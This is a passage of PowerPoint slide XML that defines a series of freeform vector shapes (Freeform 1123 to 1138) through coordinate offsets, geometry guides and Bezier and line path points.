                        <a:pt x="210" y="69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3" name="Freeform 1123"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="231" y="4238"/>
                  <a:ext cx="451" cy="749"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 749"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 626 h 749"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 749 h 749"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 120 h 749"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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1"/>
                    <a:gd name="T16" fmla="*/ 0 h 749"/>
                    <a:gd name="T17" fmla="*/ 451 w 451"/>
                    <a:gd name="T18" fmla="*/ 749 h 7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1" h="749">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="749"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451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Freeform 1124"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="781" y="3930"/>
                  <a:ext cx="1533" cy="1134"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 234 w 1533"/>
                    <a:gd name="T1" fmla="*/ 1134 h 1134"/>
                    <a:gd name="T2" fmla="*/ 0 w 1533"/>
                    <a:gd name="T3" fmla="*/ 348 h 1134"/>
                    <a:gd name="T4" fmla="*/ 1302 w 1533"/>
                    <a:gd name="T5" fmla="*/ 0 h 1134"/>
                    <a:gd name="T6" fmla="*/ 1533 w 1533"/>
                    <a:gd name="T7" fmla="*/ 785 h 1134"/>
                    <a:gd name="T8" fmla="*/ 234 w 1533"/>
                    <a:gd name="T9" fmla="*/ 1134 h 113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33"/>
                    <a:gd name="T16" fmla="*/ 0 h 1134"/>
                    <a:gd name="T17" fmla="*/ 1533 w 1533"/>
                    <a:gd name="T18" fmla="*/ 1134 h 113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33" h="1134">
                      <a:moveTo>
                        <a:pt x="234" y="1134"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="348"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1302" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1533" y="785"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234" y="113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 1125"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="994" y="4708"/>
                  <a:ext cx="1594" cy="1150"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 659 w 675"/>
                    <a:gd name="T1" fmla="*/ 47 h 487"/>
                    <a:gd name="T2" fmla="*/ 570 w 675"/>
                    <a:gd name="T3" fmla="*/ 0 h 487"/>
                    <a:gd name="T4" fmla="*/ 0 w 675"/>
                    <a:gd name="T5" fmla="*/ 153 h 487"/>
                    <a:gd name="T6" fmla="*/ 63 w 675"/>
                    <a:gd name="T7" fmla="*/ 180 h 487"/>
                    <a:gd name="T8" fmla="*/ 90 w 675"/>
                    <a:gd name="T9" fmla="*/ 201 h 487"/>
                    <a:gd name="T10" fmla="*/ 90 w 675"/>
                    <a:gd name="T11" fmla="*/ 487 h 487"/>
                    <a:gd name="T12" fmla="*/ 659 w 675"/>
                    <a:gd name="T13" fmla="*/ 337 h 487"/>
                    <a:gd name="T14" fmla="*/ 659 w 675"/>
                    <a:gd name="T15" fmla="*/ 47 h 487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675"/>
                    <a:gd name="T25" fmla="*/ 0 h 487"/>
                    <a:gd name="T26" fmla="*/ 675 w 675"/>
                    <a:gd name="T27" fmla="*/ 487 h 487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675" h="487">
                      <a:moveTo>
                        <a:pt x="659" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="644" y="26"/>
                        <a:pt x="581" y="4"/>
                        <a:pt x="570" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="153"/>
                        <a:pt x="0" y="153"/>
                        <a:pt x="0" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="153"/>
                        <a:pt x="35" y="165"/>
                        <a:pt x="63" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="187"/>
                        <a:pt x="85" y="194"/>
                        <a:pt x="90" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="224"/>
                        <a:pt x="90" y="487"/>
                        <a:pt x="90" y="487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="659" y="337"/>
                        <a:pt x="659" y="337"/>
                        <a:pt x="659" y="337"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="659" y="337"/>
                        <a:pt x="675" y="71"/>
                        <a:pt x="659" y="4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1126"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1289" y="5204"/>
                  <a:ext cx="168" cy="220"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 220 h 220"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 220"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 220"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 175 h 220"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 220 h 2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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 220"/>
                    <a:gd name="T17" fmla="*/ 168 w 168"/>
                    <a:gd name="T18" fmla="*/ 220 h 2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8" h="220">
                      <a:moveTo>
                        <a:pt x="0" y="220"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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B7DB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1127"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2321" y="4927"/>
                  <a:ext cx="168" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 218 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 218"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 218"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 173 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 218 h 21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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 218"/>
                    <a:gd name="T17" fmla="*/ 168 w 168"/>
                    <a:gd name="T18" fmla="*/ 218 h 21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8" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="218"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="21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B7DB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1128"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1289" y="5445"/>
                  <a:ext cx="168" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 125 h 125"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 125"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 125"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 80 h 125"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 125 h 1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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 125"/>
                    <a:gd name="T17" fmla="*/ 168 w 168"/>
                    <a:gd name="T18" fmla="*/ 125 h 1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8" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="125"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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FFC269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 1129"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2321" y="5166"/>
                  <a:ext cx="168" cy="128"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 128 h 128"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 128"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 128"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 83 h 128"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 128 h 12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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 128"/>
                    <a:gd name="T17" fmla="*/ 168 w 168"/>
                    <a:gd name="T18" fmla="*/ 128 h 12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8" h="128">
                      <a:moveTo>
                        <a:pt x="0" y="128"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="83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FFC269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1130"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1542" y="4961"/>
                  <a:ext cx="678" cy="656"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 678"/>
                    <a:gd name="T1" fmla="*/ 186 h 656"/>
                    <a:gd name="T2" fmla="*/ 0 w 678"/>
                    <a:gd name="T3" fmla="*/ 394 h 656"/>
                    <a:gd name="T4" fmla="*/ 678 w 678"/>
                    <a:gd name="T5" fmla="*/ 212 h 656"/>
                    <a:gd name="T6" fmla="*/ 678 w 678"/>
                    <a:gd name="T7" fmla="*/ 0 h 656"/>
                    <a:gd name="T8" fmla="*/ 0 w 678"/>
                    <a:gd name="T9" fmla="*/ 186 h 656"/>
                    <a:gd name="T10" fmla="*/ 0 w 678"/>
                    <a:gd name="T11" fmla="*/ 656 h 656"/>
                    <a:gd name="T12" fmla="*/ 678 w 678"/>
                    <a:gd name="T13" fmla="*/ 470 h 656"/>
                    <a:gd name="T14" fmla="*/ 678 w 678"/>
                    <a:gd name="T15" fmla="*/ 278 h 656"/>
                    <a:gd name="T16" fmla="*/ 0 w 678"/>
                    <a:gd name="T17" fmla="*/ 460 h 656"/>
                    <a:gd name="T18" fmla="*/ 0 w 678"/>
                    <a:gd name="T19" fmla="*/ 656 h 6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678"/>
                    <a:gd name="T31" fmla="*/ 0 h 656"/>
                    <a:gd name="T32" fmla="*/ 678 w 678"/>
                    <a:gd name="T33" fmla="*/ 656 h 65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678" h="656">
                      <a:moveTo>
                        <a:pt x="0" y="186"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="212"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="186"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="0" y="656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="678" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="460"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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1131"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1076" y="5372"/>
                  <a:ext cx="1491" cy="534"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 630 w 631"/>
                    <a:gd name="T1" fmla="*/ 2 h 226"/>
                    <a:gd name="T2" fmla="*/ 627 w 631"/>
                    <a:gd name="T3" fmla="*/ 0 h 226"/>
                    <a:gd name="T4" fmla="*/ 627 w 631"/>
                    <a:gd name="T5" fmla="*/ 5 h 226"/>
                    <a:gd name="T6" fmla="*/ 434 w 631"/>
                    <a:gd name="T7" fmla="*/ 58 h 226"/>
                    <a:gd name="T8" fmla="*/ 234 w 631"/>
                    <a:gd name="T9" fmla="*/ 115 h 226"/>
                    <a:gd name="T10" fmla="*/ 0 w 631"/>
                    <a:gd name="T11" fmla="*/ 149 h 226"/>
                    <a:gd name="T12" fmla="*/ 0 w 631"/>
                    <a:gd name="T13" fmla="*/ 198 h 226"/>
                    <a:gd name="T14" fmla="*/ 234 w 631"/>
                    <a:gd name="T15" fmla="*/ 165 h 226"/>
                    <a:gd name="T16" fmla="*/ 434 w 631"/>
                    <a:gd name="T17" fmla="*/ 108 h 226"/>
                    <a:gd name="T18" fmla="*/ 610 w 631"/>
                    <a:gd name="T19" fmla="*/ 61 h 226"/>
                    <a:gd name="T20" fmla="*/ 610 w 631"/>
                    <a:gd name="T21" fmla="*/ 61 h 226"/>
                    <a:gd name="T22" fmla="*/ 610 w 631"/>
                    <a:gd name="T23" fmla="*/ 61 h 226"/>
                    <a:gd name="T24" fmla="*/ 627 w 631"/>
                    <a:gd name="T25" fmla="*/ 55 h 226"/>
                    <a:gd name="T26" fmla="*/ 630 w 631"/>
                    <a:gd name="T27" fmla="*/ 51 h 226"/>
                    <a:gd name="T28" fmla="*/ 630 w 631"/>
                    <a:gd name="T29" fmla="*/ 2 h 22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631"/>
                    <a:gd name="T46" fmla="*/ 0 h 226"/>
                    <a:gd name="T47" fmla="*/ 631 w 631"/>
                    <a:gd name="T48" fmla="*/ 226 h 22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631" h="226">
                      <a:moveTo>
                        <a:pt x="630" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="630" y="1"/>
                        <a:pt x="629" y="0"/>
                        <a:pt x="627" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="627" y="5"/>
                        <a:pt x="627" y="5"/>
                        <a:pt x="627" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="604" y="16"/>
                        <a:pt x="492" y="42"/>
                        <a:pt x="434" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="374" y="75"/>
                        <a:pt x="289" y="99"/>
                        <a:pt x="234" y="115"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="131"/>
                        <a:pt x="39" y="174"/>
                        <a:pt x="0" y="149"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="226"/>
                        <a:pt x="178" y="181"/>
                        <a:pt x="234" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="289" y="149"/>
                        <a:pt x="374" y="125"/>
                        <a:pt x="434" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="483" y="94"/>
                        <a:pt x="570" y="74"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="616" y="59"/>
                        <a:pt x="627" y="55"/>
                        <a:pt x="627" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="629" y="53"/>
                        <a:pt x="631" y="52"/>
                        <a:pt x="630" y="51"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="630" y="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1132"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="552" y="4495"/>
                  <a:ext cx="165" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 165"/>
                    <a:gd name="T1" fmla="*/ 484 h 484"/>
                    <a:gd name="T2" fmla="*/ 0 w 165"/>
                    <a:gd name="T3" fmla="*/ 45 h 484"/>
                    <a:gd name="T4" fmla="*/ 165 w 165"/>
                    <a:gd name="T5" fmla="*/ 0 h 484"/>
                    <a:gd name="T6" fmla="*/ 165 w 165"/>
                    <a:gd name="T7" fmla="*/ 440 h 484"/>
                    <a:gd name="T8" fmla="*/ 0 w 165"/>
                    <a:gd name="T9" fmla="*/ 484 h 4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5"/>
                    <a:gd name="T16" fmla="*/ 0 h 484"/>
                    <a:gd name="T17" fmla="*/ 165 w 165"/>
                    <a:gd name="T18" fmla="*/ 484 h 4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5" h="484">
                      <a:moveTo>
                        <a:pt x="0" y="484"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165" y="44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1133"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="519" y="4533"/>
                  <a:ext cx="33" cy="446"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 33 w 33"/>
                    <a:gd name="T1" fmla="*/ 7 h 446"/>
                    <a:gd name="T2" fmla="*/ 0 w 33"/>
                    <a:gd name="T3" fmla="*/ 0 h 446"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 439 h 446"/>
                    <a:gd name="T6" fmla="*/ 33 w 33"/>
                    <a:gd name="T7" fmla="*/ 446 h 446"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 7 h 44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"/>
                    <a:gd name="T16" fmla="*/ 0 h 446"/>
                    <a:gd name="T17" fmla="*/ 33 w 33"/>
                    <a:gd name="T18" fmla="*/ 446 h 44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" h="446">
                      <a:moveTo>
                        <a:pt x="33" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="439"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="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1134"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="519" y="4488"/>
                  <a:ext cx="198" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 198 w 198"/>
                    <a:gd name="T1" fmla="*/ 7 h 52"/>
                    <a:gd name="T2" fmla="*/ 168 w 198"/>
                    <a:gd name="T3" fmla="*/ 0 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 198"/>
                    <a:gd name="T5" fmla="*/ 45 h 52"/>
                    <a:gd name="T6" fmla="*/ 33 w 198"/>
                    <a:gd name="T7" fmla="*/ 52 h 52"/>
                    <a:gd name="T8" fmla="*/ 198 w 198"/>
                    <a:gd name="T9" fmla="*/ 7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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 52"/>
                    <a:gd name="T17" fmla="*/ 198 w 198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8" h="52">
                      <a:moveTo>
                        <a:pt x="198" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="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135"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="746" y="5013"/>
                  <a:ext cx="26" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 11"/>
                    <a:gd name="T1" fmla="*/ 11 h 12"/>
                    <a:gd name="T2" fmla="*/ 2 w 11"/>
                    <a:gd name="T3" fmla="*/ 8 h 12"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 12"/>
                    <a:gd name="T6" fmla="*/ 9 w 11"/>
                    <a:gd name="T7" fmla="*/ 3 h 12"/>
                    <a:gd name="T8" fmla="*/ 9 w 11"/>
                    <a:gd name="T9" fmla="*/ 11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"/>
                    <a:gd name="T16" fmla="*/ 0 h 12"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 12 h 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" h="12">
                      <a:moveTo>
                        <a:pt x="9" y="11"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="4" y="11"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="9"/>
                        <a:pt x="9" y="1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136"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="746" y="4332"/>
                  <a:ext cx="26" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 11"/>
                    <a:gd name="T1" fmla="*/ 11 h 13"/>
                    <a:gd name="T2" fmla="*/ 2 w 11"/>
                    <a:gd name="T3" fmla="*/ 9 h 13"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 13"/>
                    <a:gd name="T6" fmla="*/ 9 w 11"/>
                    <a:gd name="T7" fmla="*/ 4 h 13"/>
                    <a:gd name="T8" fmla="*/ 9 w 11"/>
                    <a:gd name="T9" fmla="*/ 11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"/>
                    <a:gd name="T16" fmla="*/ 0 h 13"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 13 h 1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" h="13">
                      <a:moveTo>
                        <a:pt x="9" y="11"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="13"/>
                        <a:pt x="4" y="12"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="9" y="1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137"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="542" y="4339"/>
                  <a:ext cx="218" cy="756"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 92"/>
                    <a:gd name="T1" fmla="*/ 24 h 320"/>
                    <a:gd name="T2" fmla="*/ 0 w 92"/>
                    <a:gd name="T3" fmla="*/ 320 h 320"/>
                    <a:gd name="T4" fmla="*/ 92 w 92"/>
                    <a:gd name="T5" fmla="*/ 295 h 320"/>
                    <a:gd name="T6" fmla="*/ 90 w 92"/>
                    <a:gd name="T7" fmla="*/ 287 h 320"/>
                    <a:gd name="T8" fmla="*/ 8 w 92"/>
                    <a:gd name="T9" fmla="*/ 309 h 320"/>
                    <a:gd name="T10" fmla="*/ 8 w 92"/>
                    <a:gd name="T11" fmla="*/ 30 h 320"/>
                    <a:gd name="T12" fmla="*/ 92 w 92"/>
                    <a:gd name="T13" fmla="*/ 7 h 320"/>
                    <a:gd name="T14" fmla="*/ 90 w 92"/>
                    <a:gd name="T15" fmla="*/ 0 h 320"/>
                    <a:gd name="T16" fmla="*/ 0 w 92"/>
                    <a:gd name="T17" fmla="*/ 24 h 32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92"/>
                    <a:gd name="T28" fmla="*/ 0 h 320"/>
                    <a:gd name="T29" fmla="*/ 92 w 92"/>
                    <a:gd name="T30" fmla="*/ 320 h 32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92" h="320">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="320"/>
                        <a:pt x="0" y="320"/>
                        <a:pt x="0" y="320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="295"/>
                        <a:pt x="92" y="295"/>
                        <a:pt x="92" y="295"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="287"/>
                        <a:pt x="90" y="287"/>
                        <a:pt x="90" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="287"/>
                        <a:pt x="17" y="307"/>
                        <a:pt x="8" y="309"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="299"/>
                        <a:pt x="8" y="36"/>
                        <a:pt x="8" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="29"/>
                        <a:pt x="92" y="7"/>
                        <a:pt x="92" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="0"/>
                        <a:pt x="90" y="0"/>
                        <a:pt x="90" y="0"/>
                      </a:cubicBez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 1138"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1476" y="4091"/>
                  <a:ext cx="236" cy="787"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
